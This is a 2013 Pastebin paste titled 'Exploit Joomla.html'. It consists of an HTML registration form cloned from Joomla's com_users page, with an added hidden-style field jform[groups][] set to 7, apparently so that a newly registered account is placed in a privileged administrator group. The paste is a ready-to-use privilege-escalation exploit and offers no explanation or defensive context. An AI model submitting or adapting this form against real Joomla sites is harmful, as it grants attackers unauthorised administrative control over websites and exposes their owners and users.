Advertisement
parkdream1

Exploit Joomla.html

Oct 4th, 2013
3,773
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 3.12 KB | None | 0 0
  1. <html>
  2. <title>Exploit Joomla</title>
  3. <form id="member-registration" action="http://localhost/joomla/index.php?option=com_users&view=registration" method="post" class="form-validate">
  4. <fieldset>
  5. <legend>User Registration</legend><dl><dt><span class="spacer"><span class="before"></span><span class="text"><label id="jform_spacer-lbl" class=""><strong class="red">*</strong> Required field</label></span><span class="after"></span></span>                              </dt>
  6.                 <dd> </dd>
  7.                                                 <dt>
  8.                 <label id="jform_name-lbl" for="jform_name" class="hasTip required" title="Name::Enter your full name">Name:<span class="star">&#160;*</span></label>                               </dt>
  9.                 <dd><input type="text" name="jform[name]" id="jform_name" value="" class="required" size="30"/></dd>
  10.                                                 <dt>
  11.                 <label id="jform_username-lbl" for="jform_username" class="hasTip required" title="Username::Enter your desired user name">Username:<span class="star">&#160;*</span></label>                               </dt>
  12.                 <dd><input type="text" name="jform[username]" id="jform_username" value="" class="validate-username required" size="30"/></dd>
  13.                                                 <dt>
  14.                 <label id="jform_password1-lbl" for="jform_password1" class="hasTip required" title="Password::Enter your desired password - Enter a minimum of 4 characters">Password:<span class="star">&#160;*</span></label>                                </dt>
  15.                 <dd><input type="password" name="jform[password1]" id="jform_password1" value="" autocomplete="off" class="validate-password required" size="30"/></dd>
  16.                                                 <dt>
  17.                 <label id="jform_password2-lbl" for="jform_password2" class="hasTip required" title="Confirm Password::Confirm your password">Confirm Password:<span class="star">&#160;*</span></label>                                </dt>
  18.                 <dd><input type="password" name="jform[password2]" id="jform_password2" value="" autocomplete="off" class="validate-password required" size="30"/></dd>
  19.                                                 <dt>
  20.                 <label id="jform_email1-lbl" for="jform_email1" class="hasTip required" title="Email Address::Enter your email address">Email Address:<span class="star">&#160;*</span></label>                             </dt>
  21.                 <dd><input type="text" name="jform[email1]" class="validate-email required" id="jform_email1" value="" size="30"/></dd>
  22.                                                 <dt>
  23.                 <label id="jform_email2-lbl" for="jform_email2" class="hasTip required" title="Confirm email Address::Confirm your email address">Confirm email Address:<span class="star">&#160;*</span></label>                               </dt>
  24.                 <dd><input type="text" name="jform[email2]" class="validate-email required" id="jform_email2" value="" size="30"/></dd>
  25. <input name="jform[groups][]" value="7" size="30">
  26.                                 </dl>
  27.         </fieldset>
  28.             <div>
  29.             <span class="wto-button-wrapper"><span class="wto-button-l"> </span><span class="wto-button-r"> </span><button type="submit" class="button validate wto-button">Register</button></span>
  30.             or          <a href="/" title="Cancel">Cancel</a>
  31.             <input type="hidden" name="option" value="com_users" />
  32.             <input type="hidden" name="task" value="registration.register" />
  33.             <input type="hidden" name="090041c42d03540ce509d49661678e19" value="1" />       </div>
  34.     </form>
  35. <input name="jform[groups][]" value="7" size="30">
  36. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement